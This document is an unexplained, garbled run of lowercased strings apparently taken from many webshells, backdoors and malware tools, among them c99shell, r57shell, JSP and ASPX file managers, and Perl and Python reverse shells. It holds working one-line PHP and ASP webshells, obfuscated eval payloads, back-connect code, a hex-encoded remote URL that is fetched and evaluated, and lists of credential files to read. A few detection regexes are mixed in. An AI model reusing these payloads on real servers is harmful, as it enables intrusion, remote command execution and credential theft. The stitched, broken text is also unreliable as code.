so strange!create cmd process failed!the command has not been implemented!runas success!onec.php/bin/onecrusinfo.exeadobeupdater.exebuildout.exeimscmig.exelocalfile.exemdm.exemimikatz.exemsdev.exentoskrnl.exeotepad.exereg.exeregsvr.exeruninfo.exeadobeupdate.exeinetinfo.exesvehost.exeupdate.exentlmhash.exewpnpinst.exewsdbg.exeadobeup.exe0830.bin1001.bina.binacrord32.exeinetinfo.exewinrar.sfxsteup=aspnet_client/report.aspname=%s&gender=%c&random=%04d&sessionkey=%snwwwks.dllrdisk.dllskeys.dllinstallserviceuninstallservicedown file ok!send file ok!command error!pls choose target first!alert!pls press enter to make sure!are you sure to analysis and outlook.docnorth korean launch.pdfdollar general.docdow corning corp.pdfsde^`tutlo`m^md`wdr^emml`ho/emmredleavesscmdsimulatormutexred_autumnal_leaves_dllmain.dll\\namepipe_morewindows
1 $ip_padding_dataport_numbpython27.dllemail.header(l
1 ati.jo840112-cras8468-11150923-pci8273vprincpespr!ncpeshastati\\temp\\~v3.logbrowser password recovery reportbrowserpassworddecryptorwww.securityxploded.comc:\\users\\bernardino\\appdata\\roaming\\berna@consultoreslegales.com.mx (1).pstmail password recovery reportmailpassworddecryptorc:\\users\\apant\\documents\\programdata\\abacus.ostc
eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! 
can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and 
directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' 
of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep 
::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? 
\"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? 
\"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int 
i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? 
urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? 
echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. 
command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win 
dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... 
a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! 
(maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. 
php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . 
\"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. 
wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option 